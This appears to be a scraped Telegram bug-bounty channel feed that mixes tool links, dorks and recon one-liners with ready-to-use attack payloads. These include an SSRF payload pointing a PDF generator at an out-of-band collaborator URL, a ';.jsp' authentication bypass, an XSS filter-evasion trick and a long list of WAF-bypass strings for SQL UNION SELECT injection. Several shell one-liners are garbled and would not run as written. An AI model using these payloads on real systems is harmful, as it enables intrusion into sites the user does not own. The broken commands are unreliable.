2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
🚨CVE-2025-64095 (CVSS 10.0) : A Critical Flaw in DNN Platform Allows Unauthenticated Website Overwrite
⚡Dorks
HUNTER : http://product.name="DotNetNuke"
Extract all endpoints from a JS File and take your bug 🐞
- Method onewaybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
- Method twocat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
#infosec #cybersec #bugbountytips
☄️JSRecon-Buddy - A simple browser extension to quickly find interesting security-related information on a webpage.
🔴https://github.com/TheArqsz/JSRecon-Buddy
Black Hat USA 2025 Slides and files
Conference presentation slides
🔼GitHub
🔼InfoCon
❤ Share & Support & Reaction Us
🧩 #event
Hey Hunter's,
DarkShadow here back again!
SSRF in pdf generation!
this api endpoint send the pdf generation request:
POST /api/v1/convert/markdown/pdf
Add this payload:
<img src=‘burp collab url’ />
comes 200ok and hit request in burp collaborator.
You can follow me in my x.com/darkshadow2bd
#ssrf #bugbountytips
☄️ Cheapest VPS for Bug Bounty & Pentesting
⚠️ https://brutsecurity.medium.com/cheapest-vps-for-bug-bounty-pentesting-fc6686572ee3
☄️ Malicious PDF Generator - Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
✨ https://github.com/jonaslejon/malicious-pdf
#exploit
#AppSec
#Threat_Research
1⃣ Zimbra Exploit Analysis (CVE-2025-27915)
https://strikeready.com/blog/0day-ics-attack-in-the-wild
// These exploits take advantage of .ics files to breach vulnerable systems
2⃣ Notepad++ DLL Hijacking (CVE-2025-56383)
https://github.com/zer0t0/CVE-2025-56383-Proof-of-Concept
// If the threat actor has the ability to replace an applications DLL, they would have to ability to put malware directly in the same location...
3⃣ Lenovo Display Control Center - A simple ACL Exploit (CVE-2024-2175)
https://neodyme.io/de/blog/lenovo_dcc_lpe_logic
// Two operating methods are presented for achieving local administrative access: a race condition-based approach and a junction path exploitation technique
🔥FRESH BB TARGET - https://visioninstitutecolorado.com/.well-known/security.txt
Читать полностью…
I request a small support in boosting my channel where it help me to be more consistent and more active...
/channel/boost/bugbounty_tech
based on the poll, i have understood is the members of group are looking for AI content too.. thanks for all the responses and i will make plan what content should be add here and what not .
Читать полностью…
↳ Pentest References and CheatSheets
• Hacking Articles
• Hack Tricks
• Cloud Hack Tricks
• Chryzsh Pentest Book
• Total OSCP Guide
• Hack The Box OSCP Preparation
• Steflan Security
• SecWiki
• Hausec
• HighOnCoffee
• six2dez pentest-book
• 0xffsec Handbook
• haax's Cheatsheet
• golinuxcloud
• Pentest Monkey
• Web App Testing Guide
• XSS CheatSheet
• Payload Box
• Steganography Tools
• Metasploit Unleashed
• Payloads All The Things
• Mobile Security Testing Guide
• WADComs
• LOLBAS
• explainshell
#infosec #cybersecurity #bugbounty #pentest #cheatsheet
A library of tools for vibe coding
https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools
https://zhero-web-sec.github.io/writeups/
https://samcurry.net/
https://shubs.io/
https://dhiyaneshgeek.github.io/
https://bhavukjain.com/
https://rhynorater.github.io/
https://m0chan.github.io/
https://spaceraccoon.dev/
https://ott3rly.com/
https://www.jhaddix.com/blog
https://hackerrishad.me/
/channel/ChatGPT_General_Bot?start=_tgr_jAjHdy84OTAx
Читать полностью…
Hey Hunter's,
Darkshadow here back again!
✨Authentication bypass method:
✅Steps:
1. Target..com/carbon/server-admin/memory_info.jsp = redirect to login page [301 status]
2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]
Payload 👉🏼 ;.jsp
Hey Hunters,
DarkShadow here back again, dropping an
interesting XSS input sanitization bypass method.
You might have noticed that most websites currently use input sanitization by blocking certain tags and events, right!? Not really 😅
Okay, so first, have a look at some example tags that could trigger XSS:
script, img, a, iframe, object, video, audio, form, meta
<script>alert(1)</script>
alert(1)
<script <img>> alert(1) </script </img>>
<script <img>>
<script <img>> → remove <img> → <script>
</script </img>> → remove </img> → </script>
<script>alert(1)</script>
JSMap Inspector - A powerful, offline, single-file HTML tool designed for developers and security researchers to inspect and analyze JavaScript Source Map (.js.map) files.
https://github.com/ynsmroztas/JSMap-Inspector
🌀Download all bug bounty programs domains in scope items 🎯
😉Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!💥
👇🏼Step 1: Download the domains.txt file
📂step 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
📂Step 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactions❤️
🔥Oneliner to download ALL of @assetnote's wordlists:
⌨️ wget -r --no-parent -R "index.html*" wordlists-cdn.assetnote.io/data/ -nH -e robots=off
Google Dork - XSS Prone Parameters 🔥site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&
🔥Google Dork - Exposed Configs 🔍site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json©TakSec
https://x.com/livingdevops/status/1974105605431349682?t=zhTSA-5rSrgr27dqGo-QSw&s=35
Читать полностью…
🔥BB TARGET - https://www.lockheedmartin.com/en-us/contact/vulnerability-disclosure-policy.html
Читать полностью…
Johnermac
>eJPT
>eCPPTv2
>PNPT
>eWPTXv2
>Active Directory Exploitation
>CRTP
>CRTE
>CLOUD
>CONTAINER
Link 🔗:-
https://johnermac.github.io/
#Tech_book
#Sec_code_review
"Node.js Secure Coding:
Defending Against Command Injection Vulnerabilities",
July 2023.
// Learn about secure coding practices with Node.js based on realworld CVE vulnerabilities in popular open-source npm packages: 12 Vulnerable npm Packages, 33 Self-assessment Questions, 10 Chapters
Automating API Vulnerability Testing Using Postman Workflows
https://haymiz.dev//security/2024/04/27/automating-apis-with-postman-workflows/
⚡Sn1per - Automate your recon like never before!
✅ https://github.com/1N3/Sn1per
Bypass SQL union select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+